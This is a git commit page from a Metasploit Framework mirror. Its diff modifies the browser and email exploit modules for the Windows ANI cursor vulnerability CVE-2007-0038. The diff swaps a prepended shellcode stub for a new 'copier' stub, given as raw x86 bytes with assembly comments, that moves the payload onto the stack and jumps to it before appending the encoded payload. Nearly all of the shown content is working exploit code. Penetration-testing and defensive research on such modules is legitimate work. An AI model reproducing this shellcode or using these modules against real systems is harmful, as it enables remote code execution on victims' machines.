infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixed the copy-to-stack stub, should work great now 

git-svn-id: file:///home/svn/framework3/trunk@4610 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-04-02 05:42:27 +00:00
parent ac19614bb3
commit b2ff98b4e9
2 changed files with 37 additions and 31 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
modules/exploits/windows/browser/ani_loadimage_chunksize.rb
View File

@ -66,20 +66,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
{
'ConnectionType' => '-find',
},
'PrependEncoder' =>
# Our ANI file is randomly placed into a read-only segment, the only reliable
# solution is to copy our payload back to the stack and execute it there. This
# is non-optimal and should be replaced soon.
"\xeb\x0f"+ # jmp _end
"\x68\x70\x17\x00\x00"+ # push 6000
"\x59"+ # pop ecx
"\x5e"+ # pop esi
"\x29\xcc"+ # sub esp, ecx
"\x89\xe7"+ # mov edi, esp
"\xf3\xa4"+ # rep movsb
"\xff\xe4"+ # jmp esp
"\xe8\xec\xff\xff\xff", # call _start
'StackAdjustment' => -3500,
},
'Platform' => 'win',
@ -308,9 +295,25 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
# payload itself which comes after the riff chunk
riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
end
# Our ANI file is randomly placed into a read-only segment, the only reliable
# solution is to copy our payload back to the stack and execute it there. This
# is non-optimal and should be replaced soon.
copier =
"\xeb\x13"+ # jmp _end
"\x68\x00\x04\x00\x00"+ # push 1024
"\x59"+ # pop ecx
"\x5e"+ # pop esi
"\x29\xcc"+ # sub esp, ecx
"\x89\xe7"+ # mov edi, esp
"\xf3\xa4"+ # rep movsb
"\x89\xe3"+ # mov ebx, esp
"\x29\xcc"+ # sub esp, ecx
"\xff\xe3"+ # jmp ebx
"\xe8\xe8\xff\xff\xff" # call _start
# Place the RIFF chunk in front and off we go
ret = "RIFF" + [riff.length].pack('V') + riff + payload.encoded
ret = "RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded
end
# Generates a riff chunk with the first bytes of the data being a relative

33
modules/exploits/windows/email/ani_loadimage_chunksize.rb
View File

@ -57,25 +57,12 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
},
'Payload' =>
{
'Space' => 4000 + (rand(1000)),
'Space' => 1024,
'MinNops' => 32,
'Compat' =>
{
'ConnectionType' => '-bind -find',
},
'PrependEncoder' =>
# Our ANI file is randomly placed into a read-only segment, the only reliable
# solution is to copy our payload back to the stack and execute it there. This
# is non-optimal and should be replaced soon.
"\xeb\x0f"+ # jmp _end
"\x68\x70\x17\x00\x00"+ # push 6000
"\x59"+ # pop ecx
"\x5e"+ # pop esi
"\x29\xcc"+ # sub esp, ecx
"\x89\xe7"+ # mov edi, esp
"\xf3\xa4"+ # rep movsb
"\xff\xe4"+ # jmp esp
"\xe8\xec\xff\xff\xff", # call _start
'StackAdjustment' => -3500,
},
@ -293,8 +280,24 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
end
# Our ANI file is randomly placed into a read-only segment, the only reliable
# solution is to copy our payload back to the stack and execute it there. This
# is non-optimal and should be replaced soon.
copier =
"\xeb\x13"+ # jmp _end
"\x68\x00\x04\x00\x00"+ # push 1024
"\x59"+ # pop ecx
"\x5e"+ # pop esi
"\x29\xcc"+ # sub esp, ecx
"\x89\xe7"+ # mov edi, esp
"\xf3\xa4"+ # rep movsb
"\x89\xe3"+ # mov ebx, esp
"\x29\xcc"+ # sub esp, ecx
"\xff\xe3"+ # jmp ebx
"\xe8\xe8\xff\xff\xff" # call _start
# Place the RIFF chunk in front and off we go
ret = "RIFF" + [riff.length].pack('V') + riff + payload.encoded
ret = "RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded
end
# Generates a riff chunk with the first bytes of the data being a relative